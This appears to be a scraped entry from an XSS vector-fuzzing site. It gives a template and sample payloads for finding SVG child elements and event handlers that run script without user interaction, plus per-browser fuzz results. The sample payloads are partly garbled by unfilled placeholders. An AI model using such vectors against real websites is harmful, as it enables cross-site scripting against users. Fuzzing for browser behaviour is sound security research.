XSS vectors that execute automatically inside svg
1
1
1
1This vector shows which events fire without user interaction inside a SVG tag
Created byhackvertor
Created Apr 17, 2024
Updated May 25, 2025
Detecting browser...
CategoryURL Handling
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml
$[data2] placeholderevents
Template used:
<svg><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></svg>0x0D
<svg><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></svg>Sample payloads
<svg><NO_MATCHES src=1 srcdoc=1 href=1 href=1 ="alert('NO_MATCHES->')"></NO_MATCHES></svg>0x0D
<svg><NO_MATCHES ="alert('NO_MATCHES->')"></NO_MATCHES></svg><svg><img->onerror src=1 srcdoc=1 href=1 href=1 ="alert('img->onerror->')"></img->onerror></svg>0x0D
<svg><img->onerror ="alert('img->onerror->')"></img->onerror></svg>Fuzz results
Chrome 144.0.0.0 desktop Windows NT 10.0
Updated
Sat Jan 31 2026
Found 1 result
Loading...
Chrome 143.0.0.0 desktop macOS 10.15.7older version
Updated
Sat Jan 31 2026
Found 1 result
Loading...
Chrome 124.0.0.0 Unknown Unknownolder version
Updated
Thu Apr 18 2024
Found 1 result
Loading...
Firefox 147.0 desktop Linux
Updated
Sun Feb 01 2026
Found 1 result
Loading...
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0
Updated
Sat Jan 31 2026
Found 1 result
Loading...
Safari 17.4.1 Unknown Unknown
Updated
Wed Apr 17 2024
Found 1 result
Loading...